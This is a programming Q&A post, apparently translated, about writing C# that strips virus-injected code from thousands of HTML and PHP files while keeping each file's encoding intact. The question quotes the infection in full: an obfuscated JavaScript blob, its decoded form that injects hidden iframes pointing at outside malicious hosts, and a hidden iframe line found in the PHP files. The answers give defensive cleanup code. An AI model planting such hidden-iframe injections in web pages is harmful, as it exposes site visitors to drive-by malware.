Is it possible to read and write a file with minor changes without knowing its encoding in C#?

I need to download over 5000 files from FTP, all of them .html and .php files. I need to read every file, delete some things that were put there by a virus, and save it back to FTP.

I am using the following code:

    string content;
    using (StreamReader sr = new StreamReader(fileName, System.Text.Encoding.UTF8, true))
    {
        content = sr.ReadToEnd();
        sr.Close();
    }
    using (StreamWriter sw = new StreamWriter(fileName + "1" + file.Extension, false, System.Text.Encoding.UTF8))
    {
        sw.WriteLine(content);
        sw.Close();
    }

I downloaded several files manually, and some of them have <meta http-equiv="Content-Type" content="text/html; charset=windows-1250" />, but I would not want to assume they are all like that. I checked with Notepad++, and some are ANSI text files. The PHP files seem to be UTF-8 and the HTML files Windows-1250, but I would prefer not to break files while trying to fix them. So is there a way to remove the virus links from the web pages without having to know or guess the encoding?

Edit: I am trying to find and remove something like this:

var s = new String (); try {} document.rvwrew.vewr catch (d) {g = 1; c = string;} if (r && document.createTextNode) and = 2; e = Eval; t = [4.5 * U, 18 / i, 52.5 * i, 204 / i, 16 * and 80 / i, 50 * i, 222 / i, 49.5 * i, 234 / i, 54.5 * i, 202 / and, 55 * u, 232 / u, 23 * u, 206 / u, 50.5 * u, 232 / u, 34.5 * u, 216 / u, 50.5 * u, 218 / u, 50.5 * u, 220 / u, 58 * u, 230 / u, 33 * i, 242 / i, 42 * i, 194 / i, 51.5 * i, 156 / i, 48.5 * i, 218 / i, 50.5 * i, 80 / i, 19.5 * and, 196 / i, 55.5 * i, 200 / i, 60.5 * i, 78 / i, 20.5 * i, 182 / i, 24 * i, 186 / i, 20.5 * i, 246 / y, 4.5 * U, 18 / i, 4,5 * U, 210 / y, 51 * i, 228 / i, 48.5 * i, 218 / i, 50.5 * i, 228 / i, 20 * and 82 / i, 29.5 * and , 18 / u, 4.5 * U, 250 / u, 16 * u, 202 / u, 54 * u, 230 / u, 50.5 * u, 64 / u, 61.5 * u, 18 / u, 4.5 * u , 18 / u, 50 * u, 222 / u, 49.5 * i, 234 / i, 54.5 * i, 202 / i, 55 * i, 232 / i, 23 * i, 238 / u, 57 * i, 210 / y, 58 * i, 202 / y, 20 * i, 68 / i, 30 * i, 210 / y, 51 * i, 228 / i, 48.5 * i, 218 / i, 50.5 * i, 64 / i , 57.5 * i, 228 / i, 49.5 * i, 122 / i, 19.5 * i, 208 / y, 58 * i, 232 / i, 56 * i, 116 / i, 23.5 * i, 94 / i, 51 * u, 210 / u, 49 * u, 202 / u, 57 * u, 194 / u, 57.5 * u, 232 / u, 48.5 * u, 232 / u, 23 * u, 198 / u, 55.5 * u , 218 / u, 23.5 * u, 232 / u, 50.5 * i, 218 / i, 56 * and 94 / i, 57.5 * i, 232 / i, 48.5 * i, 232 / i, 23 * i, 224 / u, 52 * i, 224 / i, 19.5 * i, 64 / i, 59.5 * i, 210 / i, 50 * i, 232 / i, 52 * i, 122 / i, 19.5 * i, 98 / i, 24 * and 78 / i, 16 * I, 208 / i, 50.5 * i, 210 / i, 51.5 * i, 208 / y, 58 * i, 122 / i, 19.5 * i, 98 / i, 24 * and 78 / i , 16 * U, 230 / y, 58 * i, 242 / i, 54 * i, 202 / i, 30.5 * i, 78 / i, 59 * i, 210 / i, 57.5 * i, 210 / y, 49 * i, 210 / i, 54 * i, 210 / y, 58 * i, 242 / i, 29 * i, 208 / y, 52.5 * i, 200 / i, 50 * i, 202 / i, 55 * i, 118 / i, 56 * i, 222 / i, 57.5 * i, 210 / y, 58 * i, 210 / i, 55.5 * i, 220 / y, 29 * i, 194 / y, 49 * and , 230 / i, 55.5 * i, 216 / i, 58.5 * i, 232 / i, 50.5 * i, 118 / i, 54 * 
i, 202 / i, 51 * i, 232 / i, 29 * and 96 / i, 29.5 * i, 232 / i, 55.5 * i, 224 / y, 29 * and 96 / i, 29.5 * i, 78 / i, 31 * i, 120 / i, 23.5 * i, 210 / y, 51 * i, 228 / i, 48.5 * i, 218 / i, 50.5 * i, 124 / i, 17 * and 82 / i, 29.5 * i, 18 / i, 4.5 * U, 250 / u, 4, 5 * U, 18 / i, 51 * and, 234 / y, 55 * i, 198 / y, 58 * i, 210 / i, 55.5 * i, 220 / y, 16 * i, 210 / y, 51 * i, 228 / i, 48.5 * i, 218 / i, 50.5 * i, 228 / i, 20 * and 82 / i, 61.5 * i, 18 / i, 4.5 * i, 18 / i, 59 * i, 194 / y, 57 * and 64 / i, 51 * and 64 / i, 30.5 * i, 64 / i, 50 * i, 222 / i, 49.5 * U, 234 / i, 54.5 * i, 202 / i, 55 * i, 232 / i, 23 * i, 198 / y, 57 * i, 202 / i, 48.5 * i, 232 / i, 50.5 * i, 138 / i, 54 * i, 202 / i, 54.5 * i, 202 / i, 55 * and , 232 / i, 20 * and 78 / i, 52.5 * i, 204 / y, 57 * i, 194 / i, 54.5 * i, 202 / i, 19.5 * i, 82 / i, 29.5 * i, 204 / y, 23 * i, 230 / i, 50.5 * i, 232 / i, 32.5 * i, 232 / i, 58 * i, 228 / i, 52.5 * i, 196 / i, 58.5 * i, 232 / i, 50.5 * i, 80 / i, 19.5 * i, 230 / y, 57 * i, 198 / i, 19.5 * i, 88 / i, 19.5 * i, 208 / y, 58 * i, 232 / i, 56 * and, 116 / i, 23.5 * i, 94 / i, 51 * i, 210 / y, 49 * i, 202 / i, 57 * i, 194 / i, 57.5 * i, 232 / i, 48.5 * i, 232 / i, 2 3 * i, 198 / i, 55.5 * i, 218 / i, 23.5 * i, 232 / i, 50.5 * i, 218 / i, 56 * and 94 / i, 57.5 * i, 2 32 / i, 48.5 * i, 232 / i, 23 * i, 224 / y, 52 * i, 224 / i, 19.5 * i, 82 / i, 29.5 * i, 204 / i, 23 * i, 230 / y, 58 * i, 242 / i, 54 * i, 202 / y, 23 * i, 236 / i, 52.5 * i, 230 / i, 52.5 * i, 196 / i, 52.5 * i, 216 / i, 52.5 * i, 232 / i, 60.5 * i, 122 / i, 19.5 * i, 208 / y, 52.5 * y, 200 / y, 50 * i, 202 / i, 55 * i, 78 / i, 29.5 * i, 204 / y, 23 * i, 230 / y, 58 * i, 242 / i, 54 * i, 202 / y, 23 * i, 224 / i, 55.5 * i, 230 / i, 52.5 * and, 232 / i, 52.5 * i, 222 / i, 55 * i, 122 / i, 19.5 * i, 194 / y, 49 * i, 230 / i, 55.5 * i, 216 / i, 58.5 * U, 232 / i, 50.5 * i, 78 / i, 29.5 * i, 204 / y, 23 * i, 230 / y, 58 * i, 242 / i, 54 * i, 202 / y, 23 * i, 216 / i, 50.5 * i, 204 / y, 58 
* i, 122 / i, 19.5 * i, 96 / i, 19.5 * y, 118 / y, 51 * and 92 / i, 57.5 * i, 232 / U , 60.5 * i, 216 / i, 50.5 * i, 92 / i, 58 * i, 222 / i, 56 * i, 122 / i, 19.5 * i, 96 / i, 19.5 * i, 118 / i , 51 * and 92 / i, 57.5 * i, 202 / y, 58 * i, 130 / i, 58 * i, 232 / i, 57 * i, 210 / y, 49 * i, 234 / i, 58 * and, 202 / , 20 * and 78 / i, 59.5 * i, 210 / i, 50 * i, 232 / i, 52 * and 78 / i, 22 * ​​and 78 / i, 24.5 * i, 96 / i, 19.5 * and, 82 / i, 29.5 * i, 204 / y, 23 * i, 230 / i, 50.5 * i, 232 / i, 32.5 * i, 232 / i, 58 * i, 228 / i, 52.5 * i, 196 / i, 58.5 * i, 232 / i, 50.5 * i, 80 / i, 19.5 * i, 208 / i, 50.5 * i, 210 / i, 51.5 * i, 208 / i, 58 * and 78 / i , 22 * ​​and 78 / i, 24.5 * i, 96 / i, 19.5 * i, 82 / i, 29.5 * i, 18 / i, 4.5 * i, 18 / i, 50 * i, 222 / i, 49.5 * i, 234 / i, 54.5 * i, 202 / i, 55 * i, 232 / i, 23 * i, 206 / i, 50.5 * i, 232 / i, 34.5 * i, 216 / i, 50.5 * and, 218 / i, 50.5 * i, 220 / y, 58 * I, 230 / y, 33 * i, 242 / i, 42 * i, 194 / i, 51.5 * i, 156 / i, 48.5 * i, 218 / i, 50.5 * i, 80 / i, 19.5 * U, 196 / i, 55.5 * i, 200 / i, 60.5 * i, 78 / i, 20.5 * i, 182 / i, 24 * i, 186 / y, 23 * u, 194 / u, 56 * u, 224 / u, 50.5 * u, 220 / u, 50 * u, 134 / u, 52 * u, 210 / u, 54 * u, 200 / u, 20 * u, 204 / u, 20.5 * u, 118 / u 4,5 * U, 18 / u, 62.5 * u]; if (document.createTextNode) with (s) mm = fromCharCode; for (I = 0 ;! i = m.length; i ++) S + = mm (e ("m" + "[" + "i" + ']')); try {doc.qwe.removeChild ()} catch (d) {e (s);}

which, after decoding, is:

    if (document.getElementsByTagName('body')[0]) {
        iframer();
    } else {
        document.write("");
    }
    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://fiberastat.com/temp/stat.php');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }

And when you visit the web page, it contains this (after decoding):

    if (document.getElementsByTagName('body')[0]) {
        iframer();
    } else {
        document.write("");
    }
    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://vtempe.in/in.cgi?17');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }

The script is appended as the last 3 lines of the file and starts right after </html> with var.

The PHP files contain a line more or less like this: <iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe>, but it can be anywhere in the file.

I am not sure whether there is any way other than rewriting these files. But going through 5000 files by hand seems like too much work, and risky :-)

2 answers

Assuming none of the files are UTF-16 or UTF-32, and the parts you want to interact with are entirely 7-bit ASCII, you can open and save each file as Encoding.Default, which will round-trip any higher characters correctly.
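
A minimal sketch of that round-trip idea follows. It makes one substitution that should be stated plainly: instead of Encoding.Default it uses ISO-8859-1, because Encoding.Default is UTF-8 on .NET Core and later and would not preserve arbitrary bytes there, while ISO-8859-1 maps each byte value to the code point with the same number. The class name AsciiSafeCleaner and the regular expression are hypothetical, written only against the iframe line quoted in the question; real infected files may need a different pattern.

```csharp
using System;
using System.Text;
using System.Text.RegularExpressions;

public static class AsciiSafeCleaner
{
    // ISO-8859-1 decodes byte N to code point N, so decoding and then
    // re-encoding returns the original bytes, whatever the real encoding was.
    private static readonly Encoding Latin1 = Encoding.GetEncoding("ISO-8859-1");

    // Hypothetical pattern (an assumption): an <iframe> tag whose attributes
    // contain "visibility: hidden", followed by its closing tag.
    private static readonly Regex HiddenIframe = new Regex(
        @"<iframe\b[^>]*visibility:\s*hidden[^>]*>\s*</iframe>",
        RegexOptions.IgnoreCase);

    // Takes the raw bytes of a file and returns them with matches removed.
    public static byte[] Clean(byte[] original)
    {
        string text = Latin1.GetString(original);
        string cleaned = HiddenIframe.Replace(text, string.Empty);
        return Latin1.GetBytes(cleaned);
    }
}
```

It could be called as File.WriteAllBytes(newPath, AsciiSafeCleaner.Clean(File.ReadAllBytes(path))). Working on the raw bytes rather than through StreamReader also means a byte order mark, if present, is passed through untouched. Writing to a new path first, as the question's code does, leaves the original available for comparison.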


Clearly, the virus did not need to know the encoding of a file in order to add its content to it. Instead of treating the file as text, could you just treat it as binary and look for patterns that match what the virus added?
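
As a rough illustration of the binary approach, the sketch below searches the raw bytes for an ASCII start marker and the next ASCII end marker and drops everything in between, markers included. The names BinaryCleaner, IndexOf and RemoveRegions are hypothetical, and the markers you pass in are assumptions to be chosen from what the infected files actually contain.

```csharp
using System;
using System.IO;
using System.Text;

public static class BinaryCleaner
{
    // Index of the first occurrence of pattern in data at or after start, or -1.
    public static int IndexOf(byte[] data, byte[] pattern, int start)
    {
        if (pattern.Length == 0) return -1;
        for (int i = start; i <= data.Length - pattern.Length; i++)
        {
            int j = 0;
            while (j < pattern.Length && data[i + j] == pattern[j]) j++;
            if (j == pattern.Length) return i;
        }
        return -1;
    }

    // Removes every region that begins with startMarker and ends with the
    // next endMarker. All other bytes are copied through unchanged.
    public static byte[] RemoveRegions(byte[] data, string startMarker, string endMarker)
    {
        byte[] start = Encoding.ASCII.GetBytes(startMarker);
        byte[] end = Encoding.ASCII.GetBytes(endMarker);
        using (var output = new MemoryStream(data.Length))
        {
            int pos = 0;
            while (pos < data.Length)
            {
                int s = IndexOf(data, start, pos);
                int e = s < 0 ? -1 : IndexOf(data, end, s + start.Length);
                if (s < 0 || e < 0)
                {
                    // No further complete region: keep the rest as it is.
                    output.Write(data, pos, data.Length - pos);
                    break;
                }
                output.Write(data, pos, s - pos); // bytes before the region
                pos = e + end.Length;             // skip the region itself
            }
            return output.ToArray();
        }
    }
}
```

For the iframe quoted in the question, a call might look like BinaryCleaner.RemoveRegions(bytes, "<iframe src=\"http://hugetopdiet.cn", "</iframe>"). A start marker that is too short could match legitimate content, so it seems worth checking the result on a handful of files before running it over all 5000.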


Source: https://habr.com/ru/post/908093/

